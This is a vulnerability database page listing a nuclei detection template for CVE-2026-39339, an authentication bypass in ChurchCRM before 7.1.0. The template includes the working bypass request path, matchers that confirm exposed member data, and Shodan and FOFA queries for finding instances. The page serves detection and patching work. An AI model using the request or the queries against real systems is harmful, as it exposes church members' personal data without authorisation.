Lucene search
K

ChurchCRM - API Authentication Bypass via URL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

ChurchCRM allows unauthenticated access to protected API endpoints via URL injection in middleware.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-39339
7 Apr 202617:58
attackerkb
Circl
CVE-2026-39339
7 Apr 202619:35
circl
CNNVD
ChurchCRM 安全漏洞
7 Apr 202600:00
cnnvd
CVE
CVE-2026-39339
7 Apr 202617:58
cve
Cvelist
CVE-2026-39339 ChurchCRM has an API Authentication Bypass
7 Apr 202617:58
cvelist
EUVD
EUVD-2026-19839
7 Apr 202617:58
euvd
NVD
CVE-2026-39339
7 Apr 202618:16
nvd
Positive Technologies
PT-2026-30962
7 Apr 202600:00
ptsecurity
RedhatCVE
CVE-2026-39339
5 Jun 202619:12
redhatcve
Vulnrichment
CVE-2026-39339 ChurchCRM has an API Authentication Bypass
7 Apr 202617:58
vulnrichment
Rows per page
id: CVE-2026-39339

info:
  name: ChurchCRM - API Authentication Bypass via URL Injection
  author: akhilshekhar
  severity: critical
  description: |
    ChurchCRM < 7.1.0 contains an authentication bypass caused by improper API middleware URL handling in ChurchCRM/Slim/Middleware/AuthMiddleware.php, letting unauthenticated attackers access protected API endpoints, exploit requires crafted request URL with 'api/public
  impact: |
    Unauthenticated attackers can access all protected API endpoints, exposing sensitive church member data and system information.
  remediation: |
    Update to version 7.1.0 or later.
  reference:
    - https://github.com/ChurchCRM/CRM/security/advisories/GHSA-v3p2-mx78-pxhc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-39339
    epss-score: 0.01351
    epss-percentile: 0.68153
    cwe-id: CWE-284
    cpe: cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*
  metadata:
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: cve,cve2026,churchcrm,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/persons/latest?bypass=/api/public"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PersonId"
          - "FormattedName"
          - "\"people\""
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f9991d88816275be9e56052aec264e8b2b97b3f5e8b6781763b4f04d6a145e850220180c84791b1d7fe68fc17ac662039750c8e59d24963bc2ed212cf4573a8ffb39:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2026 13:57Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.1
EPSS0.01351
SSVC
9